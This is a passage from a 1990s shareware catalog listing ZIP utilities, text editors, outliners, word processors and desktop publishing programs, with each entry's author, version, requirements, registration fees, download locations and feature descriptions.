(about five minutes with a 2400 baud modem) + Description: + DOS & Windows & 4DOS descripts. Allows you to tag files to add + to a ZIP file in full screen mode, and then add them along with + their 4Dos file descriptions. It also displays the files in the + ZIP file along with their descriptions. You can also tag the + files in ZIP file, and extract them along with their 4DOS file + descriptions. + + Chapter 2, "Utilities" 220 + + + + Product: ZIP Fugue (Windows) + Author: Fugue Software, +61-7-824-2843 + Version: 2.0 (04-25-94) + Needs: IBM AT (80286), Windows 3.0 or better. EGA monitor; Hard + disk; Mouse. + Strongly recommended: VGA monitor. + Registration fee: $20.00 (add $8.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; bonus utilities; all ASP-wide offers (see + page 6); disks of other shareware; discounts on other products. + Look for: availability unknown on BBSs; ZIPW20.ZIP on CompuServe + in CIS:PCVENB forum LIBrary 10 (or contact userID 100036,311 + for assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + DOS & & Windows & 4DOS descripts. Allows you to tag files to + add to a ZIP file in full screen mode, and then add them along + with their 4Dos file descriptions. It also displays the files + in the ZIP file along with their descriptions. You can also tag + the files in ZIP file, and extract them along with their 4DOS + file descriptions. + + + Product: Zip Server(TM) + PKZIP 2.04g compatible Windows utility. See full description + on page 55. + + Product: ZiPaper + Wallpaper changer uses PKZip to save space. See full + description on page 55. + + 2.9.7 For Sidekick + + Product: VB-Dial + Multimedia phone dialer/comm package. See full description on + page 157. + + 2.9.8 For other + + Product: BCM Menu System + Menu, disk maint,text editor & compress shell. See full + description on page 196. + + Chapter 3, "Writing applications" 221 + + + + + + Chapter 3 + Writing applications + + See also: Utilities, File utilities, File viewers; Education, + Writing. + + + 3.1 Text viewers/readers + + Product: DEXTER Text Editor + Premium quality multi-file text editor. See full description + on page 225. + + Product: MultiVu + Find/view/extract text, browse archive files. See full + description on page 63. + + + 3.2 Text editors + + See also: Writing applications, Word processors. + + Product: BCM Menu System + Menu, disk maint,text editor & compress shell. See full + description on page 196. + + Product: Bingo Text Editor + Author: Sunderland Software, 410-379-9019 + Version: 4.00a (10-26-94) + Needs: IBM PC, DOS 3.0 or better. 320k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $75.00 (add $15.00 for shipping to Canadian + addresses) (add $15.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; all ASP- + wide offers (see page 6). + Look for: availability unknown on BBSs; BE400A.ZIP on CompuServe + in CIS:IBMAPP forum LIBrary 1 (or contact userID 70541,3614 for + assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + A complete text editing system featuring virtual memory for + files far larger than memory, multi level undo, the Chess + extension lanaguage, customizable Syntax Highlighting, and + user-definable menus. Supprts multiple files, multiple menus, + mouse, keyboard definition, and more. + + Chapter 3, "Writing applications" 222 + + + + Product: BOXER/DOS Text Editor + Author: Boxer Software, 603-924-6602 + Version: 7.0a (06-16-95) + Needs: IBM AT (80286), DOS 3.0 or better. 384k RAM; Dual 720k + floppy drives. + Strongly recommended: Hard disk. + Registration fee: $50.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, newsletter, mail support; 1-month return + policy; bonus utilities; all ASP-wide offers (see page 6); + disks of other shareware; discounts on other products; + discounts on upgrades. 1-month free upgrading allowed. 1 free + update disk(s) sent out. + Look for: BOXER*.ZIP on BBSs (call 603-924-3859 to download it at + no charge); BOXER.ZIP on CompuServe in CIS:PCVENI forum LIBrary + 3 (or contact userID 74777,170 for assistance); BOXER*.ZIP on + GEnie in IBMPC forum LIBrary 3 (or contact userID USE INTERNET + for assistance). + Download size: 356k (about 27 minutes with a 2400 baud modem) + Description: + A powerful but courteous text editor which is packed with + features: color syntax highlighting, multi-level undo and redo, + full mouse support, multiple files/windows, macros, graphic + drawing, column marking, compile from editor, word processing, + and context sensitive help. Search & replace with wildcards; + globally, selectively or across all edited files. + Reconfigurable keyboard with popular maps supplied; pull-down + menus & online help change dynamically to reflect reassignment. + Much more! + + + Product: BOXER/OS2 Text Editor + Author: Boxer Software, 603-924-6602 + Version: 7.0a (06-16-95) + Needs: IBM 80386, OS/2 2.0 or better. Hard disk. + Registration fee: $89.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + newsletter, mail support; 1-month return policy; all ASP-wide + offers (see page 6); disks of other shareware; discounts on + other products; discounts on upgrades. 1-month free upgrading + allowed. 1 free update disk(s) sent out. + Look for: BOXOS2*.ZIP on BBSs (call 603-924-3859 to download it + at no charge); BOXOS2.ZIP on CompuServe in CIS:PCVENI forum + LIBrary 3 (or contact userID 74777,170 for assistance); + + Chapter 3, "Writing applications" 223 + + + + BOXOS2*.ZIP on GEnie in OS2 forum LIBrary 11 (or contact userID + USE INTERNET for assistance). + Download size: 437k (about 33 minutes with a 2400 baud modem) + Description: + A powerful but courteous editor which is packed with features: + color syntax highlighting, multi-level undo and redo, full + mouse support, macros, graphic drawing, column marking, compile + from editor, word processing, and context sensitive help. This + 32-bit charcter mode program supports HPFS filenames and makes + full use of OS/2's virtual memory to edit very large files. + Fully reconfigurable keyboard: pull-down menus & online help + change dynamically to reflect reassignment. Much more! + + + Product: CODE-A-LINE + Outline processor, text editor, printing util. See full + description on page 231. + + Product: DEXTER Text Editor + Author: FAGERLUND CONSULTING, 604-984-7330 + Version: 2.00 (01-16-95) + Needs: IBM PC, DOS 2.0 or better. 180k RAM. + Registration fee: $44.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, CompuServe, mail + support; 3-month return policy; bonus utilities. 3-month free + upgrading allowed. + Look for: DEXTER.ZIP on BBSs; DEXTER.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 1 (or contact userID 70253,1046 for + assistance). + Download size: 110k (about eight minutes with a 2400 baud modem) + Description: + DEXTER is a PREMIUM QUALITY, super fast, full featured, multi- + file text editor which is compact and EASY to use. Has + interactive multi-file search & replace, NO FILE SIZE LIMIT, + split and/or boxed windows, context sensitive help, on-line + local & global configuration, keyboard reconfig, wonderful + customizable menus, TEMPORARY QUIT, word processing, line + drawing, column blocks, macros, multiple printers, ASCII table, + 43/50 line mode, colour or b/w. Don't let the size fool you, + this one's loaded. + + Chapter 3, "Writing applications" 224 + + + + Product: EDITEUR + Author: Jean-Pierre Menicucci + Version: V2.2 (06-30-95) + Needs: IBM AT (80286), Windows 3.1 or better. 300k RAM; VGA + monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $24.00 + Registration benefits: 31/2" master disk(s); lifetime unlimited + fax, BBS, CompuServe, mail support. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; EDIT.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 2 (or contact userID 73261,2701 for + assistance). + SWREG#: 1724 + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + Text editor. Handles Windows, Dos, and Unix text files. + Multitext, unlimited file size (good at handling very large + files). Word wrap, line, column (mouse right button), and block + selections, viewing of tabs, spaces, and paragraphs. Font + choice, toolbar, tooltips, status bar, help. Print, page setup, + unlimited undo/redo, usual edit features + append & edit to/ + from file, bookmarks, multitext and powerful searches and + replacements, macros, sortings, ... + + + Product: ELFTREE + Packs 100s of file/dir/pgm management utils. See full + description on page 196. + + Product: MEGA EDIT Editor for Windows + Author: COMPUTER WITCHCRAFT, INC., 502-589-6800 + Version: 2.11 (03-24-94) + Needs: IBM AT (80286), Windows 3.0 or better. 125k RAM; EGA + monitor; Hard disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $35.50 (add $3.50 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $9.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; lifetime return policy; all ASP-wide + offers (see page 6); disks of other shareware. Lifetime free + upgrading allowed. + Look for: availability unknown on BBSs; MEGAED.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 2 (or contact userID 76130,1463 + for assistance). + Download size: 140k (about eleven minutes with a 2400 baud modem) + Description: + A Windows application that allows editing of very large text + files. Named "WinAp of the Month" by Compute! magazine and + included in PC World's "Best programs for under $50." Has + split screen for up to 20 files, variable sizable display + fonts, import/export UNIX & Mac files, word-wrap, formatted + + Chapter 3, "Writing applications" 225 + + + + display of binary files, search & replace, fully CUA compliant, + and file size only limited by Windows virtual memory. America + Online "Editors Choice." + + + Product: PostCardMaster + Postcard & mail handling system. See full description on + page 287. + + Product: Power Edit + Network text editor, email, file encryption. See full + description on page 429. + + Product: QENV + Quick envelope addressor & letter writer. See full description + on page 99. + + Product: Ravitz Editor + Author: Ravitz Software Inc. + Version: 1.10b (08-12-93) + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Registration fee: $0.00 + Registration benefits: + Look for: RAVED.ZIP on BBSs (call 606-268-0577 to download it at + no charge); RAVED.ZIP on CompuServe in CIS:IBMAPP forum LIBrary + 1 (or contact userID 70431,32 for assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + A fast, powerful, mid sized text editor. It has integrated + outlining and overviewing, area mark manipulation (copy, fill, + shift, sort, etc.), find/change, word wrap and reflow, line + drawing, multiple file handling, change tracking, flexible user + interface (function keys, mouse, menus), and it is configurable + and programmable. + + + Product: READ + Author: Wells Computing Services, 813-447-0604 + Version: 2.5 (07-02-95) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse; + Epson printer; math coprocessor. + Registration fee: $15.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of phone, mail support; 1-month + limited return policy. + Look for: READ25.ZIP on BBSs. + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + A program for reading and editing ASCII text files. The program + uses most of the popular MS-DOS EDITOR keystrokes, but is much + more compact. Includes "search and replace" and printer + + Chapter 3, "Writing applications" 226 + + + + support. Reads huge files by breaking them into segments. Has + on-line help, and comes with an ASCII text file (READ.DOC) + describing the features available. + + + Product: Technical Editor (DOS) + Author: On-Target Software, 415-474-9973 + Version: 2.80 (08-15-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Registration fee: $39.95 + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, CompuServe, mail support; 1-month return policy; all ASP- + wide offers (see page 6). 2-month free upgrading allowed. + Look for: TE280DOS.ZIP on BBSs (call 7147519307 to download it at + no charge); TE280D.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 0 (or contact userID 72557,3003 for assistance). + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + Fast DOS programmers editor. Edits any size file. Multi-screen + and multi-window editing. Undo last 1000 changes. Redefinable + keys. Line and column blocking. Interactive configuration. + 25,43,50 line modes. Single small executable contains entire + program. Keystroke macros (can save and load from disk). Edits + binary files. History file: remembers last 20 files edited + including what line and column you were on. + + + Product: Technical Editor (OS/2) + Author: On-Target Software, 415-474-9973 + Version: 2.80 (08-15-94) + Needs: IBM 80386, OS/2 2.0 or better. + Registration fee: $39.95 + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, CompuServe, mail support; 1-month return policy; all ASP- + wide offers (see page 6). 2-month free upgrading allowed. + Look for: TE280OS2.ZIP on BBSs (call 7147519307 to download it at + no charge); TE265*.ZIP on CompuServe in CIS:IBMOS2 forum + LIBrary 0 (or contact userID 72557,3003 for assistance). + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + Fast 32 bit OS/2 2.0 programmers editor. Multi-screen and + multi-window editing. UNDO last 1000 changes. Redefinable keys. + Line and rectangular blocking. Interactive configuration. + 25,43,50 line modes. Single small executable contains entire + program. Supports up to 50000 character lines with no line + limit. Keystroke macros (can be saved and loaded from disk). + Edits binary files. History file: Remembers last 20 files + edited with row/column position. + + Chapter 3, "Writing applications" 227 + + + + Product: Technical Editor (Windows NT) + Author: On-Target Software, 415-474-9973 + Version: 2.80 (08-15-94) + Needs: IBM PC, Windows 3.0 or better. 1000k RAM. + Registration fee: $39.95 + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, CompuServe, mail support; all ASP-wide offers (see + page 6). + Look for: TE280NT.ZIP on BBSs (multiple files) (call 7147519307 + to download it at no charge). + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + Full-featured, fast and powerful programmers editor. Edits + files larger than available RAM under DOS. 32 bit versions for + OS/2 and now Windows NT. Multi-Window, keyboard configurable, + undo, and everything else. Selected as personal favorite in + Computer Language Magazine review (June 91). + + + Product: Vision Edit + Author: Andrzej Brzezinski, 204-943-4020 + Version: 3.5 (04-30-93) + Needs: IBM PC, DOS 2.0 or better. 512k RAM. Strongly + recommended: expanded memory and/or disk cache. + Registration fee: $35.00 + Registration benefits: Phone/newsletter support, one year free + updates, bonus protected-mode version. + Look for: VISED35.ZIP on BBSs (call 507-288-6128 to download it + at no charge); VED35A.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 1. + Download size: 410k (about 31 minutes with a 2400 baud modem) + Description: + An easy-to-use and powerful text editor. It allows editing many + files simultaneously. Each file is opened in a separate window + that can be resized and moved around. Most functions can be + selected from the pull-down menus using mouse or keyboard. More + experienced users can invoke most commands using configurable + hot keys. You can customize many features: colors, editing + options, hot keys. Other features: print manager, file manager, + macro editor, help, calculator. + + + Product: Windev - Windows Developer + Editor/programmer's tools for Windows 3.1. See full + description on page 495. + + Product: Windev - Windows NT Developer + Editor/programmer's tools for Windows NT. See full description + on page 496. + + Chapter 3, "Writing applications" 228 + + + + Product: WinEdit Lite + Author: Wilson WindowWare, Inc., 206-938-1740 + Version: 2.0 (02-01-93) + Needs: IBM AT (80286), Windows 3.1 or better. 2k RAM; VGA + monitor; Hercules monitor; Hard disk; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Mouse. + Strongly recommended: 4meg ram. + Registration fee: $29.95 (add $10.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 3 months of unlimited + phone, fax, BBS, CompuServe, mail support; 3-month return + policy; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + Download size: 1700k (about 126 minutes with a 2400 baud modem) + Description: + File sizes can be as large as virtual memory gets. This savvy + editor is swift, swift, swift. You also get sophisticated + search and replace. Printing out two side by side pages in + landscape is perfect for getting two pages onto one. + + + Product: WinEdit Pro + Author: Wilson WindowWare, Inc., 206-938-1740 + Version: 2.0 (02-01-93) + Needs: IBM AT (80286), Windows 3.1 or better. 2000k RAM; EGA + monitor; Hercules monitor; Hard disk; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Mouse. + Registration fee: $89.95 (add $10.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; 3-month return policy; all + ASP-wide offers (see page 6). + Look for: WE-20N.ZIP on BBSs (call 206-935-5198 to download it at + no charge); WE-20N.ZIP on CompuServe in CIS:WILSON forum + LIBrary 0 (or contact userID 76702,1072 for assistance). + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + Can handle files as large as memory - real plus virtual. So - + it's swift. Programmers will be able to customize this to craft + their very serious programming solution. Of course, there are + programming automation features; make, build, rebuild, etc. + This Pro version adds both editor and Windows macro languages. + You get both performance and thorough control of your + programming environment. + + Chapter 3, "Writing applications" 229 + + + + Product: WinEdit Standard + Author: Wilson WindowWare, Inc., 206-938-1740 + Version: 2.0 (02-01-93) + Needs: IBM AT (80286), Windows 3.1 or better. 2000k RAM; EGA + monitor; Hard disk; Mouse. + Strongly recommended: SVGA monitor; HP DeskJet printer; HP + LaserJet printer; Postscript printer. + Registration fee: $59.95 (add $10.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; all ASP-wide offers (see + page 6). + Look for: WE-20N.ZIP on BBSs (call 206-935-5198 to download it at + no charge); WE-20N.ZIP on CompuServe in CIS:WINAPA forum + LIBrary 15 (or contact userID 76702,1072 for assistance). + Download size: 1250k (about 93 minutes with a 2400 baud modem) + Description: + Offers fast performance, large file sizes, a lean and swift + interface. File sizes as large as all of memory - actual and + virtual. That's why it's fast. Includes real expression + searching and programming features. Menu items quickly generate + compiles, rebuilds, makes, and so on. Works with Windows SDK, + xbase, Cobol, Fortran, and other languages. + + + Product: WordMaster + ASCII word processor for general applications. See full + description on page 236. + + 3.2.1 Text/binary editors + + Product: DO + FAST text/bnry file manipulator, sort, filter. See full + description on page 36. + + Chapter 3, "Writing applications" 230 + + + + 3.3 Text organizers/outliners + + Product: CODE-A-LINE + Author: Optimax Corporation, 312-561-6363 + Version: 1.0 (03-22-94) + Needs: IBM AT (80286), Windows 3.1 or better. 128k RAM; Program + can run safely on a system with no hard disk and only one + floppy disk drive; VGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $15.00 + Registration benefits: lifetime unlimited phone, fax, CompuServe, + mail support; all ASP-wide offers (see page 6); discounts on + other products. + Look for: availability unknown on BBSs; CODE.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 10 (or contact userID 75020,3617 for + assistance). + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + Folding outliner/editor for ASCII text files (e.g. program + source code). Represent structure by indenting lines. Fold and + unfold program elements. Edit and restructure text with + unlimited Undo. Print professionally-looking source code + listings, complete with page headings and line numbers. + Customizable fonts, colors, etc. Maintain several sets of + customization options, via configuration files, fine-tuned for + different purposes (e.g. editing vs. printing). + + + Product: DeskTop Advisor(R) + Create/browse popup hypertext w/images, sound. See full + description on page 483. + + Product: dtSearch for DOS + Text retrieval program. See full description on page 289. + + Product: dtSearch for Windows + Text retrieval program. See full description on page 289. + + Chapter 3, "Writing applications" 231 + + + + Product: MARGARINE + Author: Tay-Jee Software, 703-261-7023 + Version: 3.11 (01-01-93) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $14.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6); disks of other shareware; + discounts on other products. + Look for: MARGAR??.ZIP on BBSs; MARGAR.ZIP on CompuServe in + CIS:IBMSYS forum LIBrary 3 (or contact userID 72330,1776 for + assistance). + Download size: 40k (about three minutes with a 2400 baud modem) + Description: + A useful utility for formatting text files, especially + shareware documentation files. Will quickly go through a text + file and report the space available for creating a left margin + while maintaining the document's original formatting. Supports + page widths of 25-132 columns. Also will add top and bottom + margins as well as page numbers if requested. Menu-driven + interface; three options for handling embedded form-feed + characters; option to convert extended characters to Epson. + + + Product: Ravitz Editor + Text editor/outliner. See full description on page 225. + + Product: WhizNotes + Author: Advanced Supprt Group, Inc., 314-965-5630 + Version: 2.0 (03-20-94) + Needs: IBM AT (80286), Windows 3.1 or better. Microsoft help + compiler (for help file generation). + Registration fee: $49.95 (add $4.50 for shipping to U.S. + addresses) (add $4.50 for shipping to Canadian addresses) (add + $9.00 for shipping outside U.S. or Canada) + Registration benefits: quick-reference card; 3 months of + unlimited CompuServe, mail support; 1-month return policy; + royalty-free runtime license; bonus utilities; discounts on + upgrades. + Look for: availability unknown on BBSs; WHIZNT.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 0 (or contact userID 71303,20 for + assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Powerful text organizer and help generator. Begin using it and + never lose track of your ideas and notes. Use long descriptive + names for your notes, group them into folders, easily retrieve + and view them, search through them for any piece of + information, insert hypertext jumps to move from note to + note,... That's not all! You can convert your notes into + + Chapter 3, "Writing applications" 232 + + + + Windows Help with just a click on the menu. Many advanced + features for note-taking and help generation. + + + 3.4 Word processors + + See also: Writing applications, Text editors. + + Product: Bookbild/DOS Pamphlet Publisher + Converts doc. file to camera-ready booklet. See full + description on page 265. + + Product: BOXER/DOS Text Editor + Full-featured text editor/word processor. See full description + on page 221. + + Product: BOXER/OS2 Text Editor + Full-featured text editor/word processor. See full description + on page 222. + + Product: Cumberland Diary + Powerful diary/journal entry program. See full description on + page 179. + + Product: Cumberland Story + Write your own or ancestors life story. See full description + on page 605. + + Product: Daily Log Book + Diary or Journal. See full description on page 180. + + Product: Easy Word + Author: Easy Software, 01625-614669 + Version: 9.2 (06-16-95) + Needs: IBM AT (80286), DOS 5.0 or better. 640k RAM; Hard disk. + Registration fee: $45.00 + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of unlimited CompuServe, mail support; all ASP-wide + offers (see page 6). + Look for: availability unknown on BBSs. + SWREG#: 3047 + PsL#: 11490 + Download size: 751k (about 56 minutes with a 2400 baud modem) + Description: + Probably the easiest word processor to learn. Facilities + include line drawing, table entry mode and macros. Will batch + print odd and even pages separately for double sided printing. + Secure erase facility for classified documents and built-in + backup system. + + + Product: EnVision Publisher + Desktop publishing program (full-feature). See full + description on page 239. + + Chapter 3, "Writing applications" 233 + + + + Product: Hebrew Edit + Author: Right to Left Software, 416-489-7440 + Version: 1.2b (02-14-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor; Dual 720k floppy drives; Hard disk; HP + DeskJet printer; HP LaserJet printer; Epson printer. + Strongly recommended: VGA monitor. + Registration fee: $19.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + phone, fax, CompuServe, mail support; 2-month return policy; + bonus templates; all ASP-wide offers (see page 6); discounts on + other products; discounts on upgrades. + Look for: availability unknown on BBSs; HEBED.ZIP on CompuServe + in CIS:FLEFO forum LIBrary 14 (or contact userID 71542,3631 for + assistance). + Download size: 143k (about eleven minutes with a 2400 baud modem) + Description: + Hebrew text editor that supports the Hebrew vowels (Nikud). Has + bilingual menus, clear bright screen fonts. Prints beautiful + large letters in block or script fonts, on all major printers + (LaserJet, DeskJet, Dot matrix). Practice your Hebrew with the + sample files that are included. + + + Product: The Letterhead Kit/DOS + Retrieves custom letterheads, graphics, bills. See full + description on page 268. + + Product: The Letterhead Kit/Win + Retrieves custom letterheads, graphics, bills. See full + description on page 268. + + Product: My Life + Diary and Journal for young & old alike. See full description + on page 637. + + Product: QENV + Quick envelope addressor & letter writer. See full description + on page 99. + + Product: Technical Editor (OS/2) + 32-bit programmers editor for OS/2 2.x. See full description + on page 226. + + Chapter 3, "Writing applications" 234 + + + + Product: Word Fugue + Author: Fugue Software, +61-7-824-2843 + Version: 3.1 R1 (01-15-94) + Needs: IBM PC, DOS 3.0 or better. 400k RAM; Dual 720k floppy + drives; Hard disk. + Registration fee: $55.00 (add $10.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; 1-month return policy; bonus utilities; all ASP- + wide offers (see page 6). 2-month free upgrading allowed. + Writing style guide; sample documents. + Look for: availability unknown on BBSs; WF310*.ZIP on CompuServe + in CIS:IBMAPP forum LIBrary 3 (multiple files) (or contact + userID 100036,311 for assistance). + Download size: 700k (about 52 minutes with a 2400 baud modem) + Description: + Industrial strength word processor. Multiple file editing (up + to 8 windows & copy text between), pull down menus, autosave, + macros, context sensitive help, tables & columns (with + independent wrap), newspaper (snaking) columns, automatic + footnotes and endnotes, generation of table of contents & + indexes, spell checker, supports many printers (also lasers & + postscript), comprehensive mail merge (including IF ELSE). + Built in calculator (also available during printing), revision + marking and more + + + Product: WordMaster + Author: MasterWorks, 206-495-4574 + Version: 1.81 (03-01-93) + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Registration fee: $30.00 + Registration benefits: Master disks, one free upgrade. + Look for: WDMASTER.EXE on BBSs (call 901-753-7213 to download it + at no charge); WDMSTR.EXE on CompuServe in CIS:IBMAPP forum + LIBrary 2 (or contact userID 73527,1676 for assistance); - on + GEnie in - forum LIBrary 0 (or contact userID - for + assistance). + Download size: 210k (about 16 minutes with a 2400 baud modem) + Description: + Full-featured word processor with extensive pull-down menu + system and on-line help. Includes: multiple fonts, macros, + windows, search and replace, cutting/pasting text, headers/ + footers, automatic pagination, the ability to customize colors + and more. The documentation includes examples of using various + functions to help you work easier and faster. + + Chapter 3, "Writing applications" 235 + + + + Product: Writer's Cramp + Author: JRE Enterprises + Version: 2.2 (09-30-94) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; EGA monitor; + Hard disk; VBRUN300.DLL. PKUNZIP v2.04G or later. + Strongly recommended: VGA monitor; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Mouse; Epson printer. + Registration fee: $9.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + BBS, CompuServe, mail support; 3-month return policy; all ASP- + wide offers (see page 6); discounts on upgrades. 3-month free + upgrading allowed. + Look for: WRCR22.ZIP on BBSs (call 602-814-0483 to download it at + no charge); WRCR22.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71162,2311 for assistance). + SWREG#: 2475 + Download size: 1223k (about 91 minutes with a 2400 baud modem) + Description: + An inexpensive and simple word processor with many of the + features found in major word processors. Uses a database to + store its letters. Multiple letter databases can be created, + one for each member of the family. Each letter database can be + password protected. + + + 3.5 Desktop publishing + + Product: AdMaker + Author: OsoSoft, 805-528-1759 + Version: 3.5 (05-06-94) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Registration fee: $30.00 + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited fax, BBS, CompuServe, mail support; lifetime + return policy; bonus graphics; all ASP-wide offers (see + page 6); discounts on upgrades. Lifetime free upgrading + allowed. + Look for: ADMAKER.ZIP on BBSs (call 805-528-3753 to download it + at no charge); ADMAKE.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71571,222 for assistance). + Download size: 190k (about 14 minutes with a 2400 baud modem) + Description: + Lets you design display ads up to 7.5" X 9.5" in Windows. Use + TT/ATM fonts; BMP/PCX clip art; line drawing tools. Print 100% + or 200% size layouts. Rotate text; click to position text; + insert special characters; filled boxes; text can overwrite + graphics; WYSIWYG display; right-click help; much, much more. + Use to create ads for your business or for others. Fast, easy, + and accurate! Use for any simple display ad. Much faster than + using Corel. + + Chapter 3, "Writing applications" 236 + + + + Product: Bookbild/DOS Pamphlet Publisher + Converts doc. file to camera-ready booklet. See full + description on page 265. + + Product: Bookbild/Win Pamphlet Publisher + Builds single-fold brochures in WPWIN 5.2. See full + description on page 266. + + Product: Chartist(tm) + Flowcharting and org charting. See full description on + page 553. + + Product: Crossword Clipper for DOS + Author: PC HELP-LINE, 909-797-3091 + Version: 2.00 (04-15-94) + Needs: IBM PC, DOS 3.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor. Crossword Creator for puzzle design. + Strongly recommended: Mouse. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; 1-month return policy; discounts on other products. + 3-month free upgrading allowed. + Look for: CLPD20.ZIP on BBSs; CWCLPD.ZIP on CompuServe in + CIS:IBMNEW forum LIBrary 8 (or contact userID 72357,3523 for + assistance). + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + This crossword layout tool creates .PCX graphic files, suitable + for importing into word-processors or graphics applications. + WYSIWYG display lets you resize the puzzle grid, select fonts, + etc. Also creates ASCII text files containing puzzle clues. + Cannot be used for puzzle design, but will accept crossword + data files (.XWP format only) from other programs. + + Chapter 3, "Writing applications" 237 + + + + Product: Crossword Clipper for Windows + Author: PC HELP-LINE, 909-797-3091 + Version: 2.00 (04-15-94) + Needs: IBM 80386, Windows 3.1 or better. Crossword Creator for + puzzle design. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support. 1-month return policy. 3-month free upgrading allowed. + Look for: CLIP20.ZIP on BBSs; CWCLIP.ZIP on CompuServe in + CIS:IBMNEW forum LIBrary 8 (or contact userID 72357,3523 for + assistance). + Download size: 370k (about 28 minutes with a 2400 baud modem) + Description: + This crossword layout tool works with the Windows Clipboard, + enabling you to 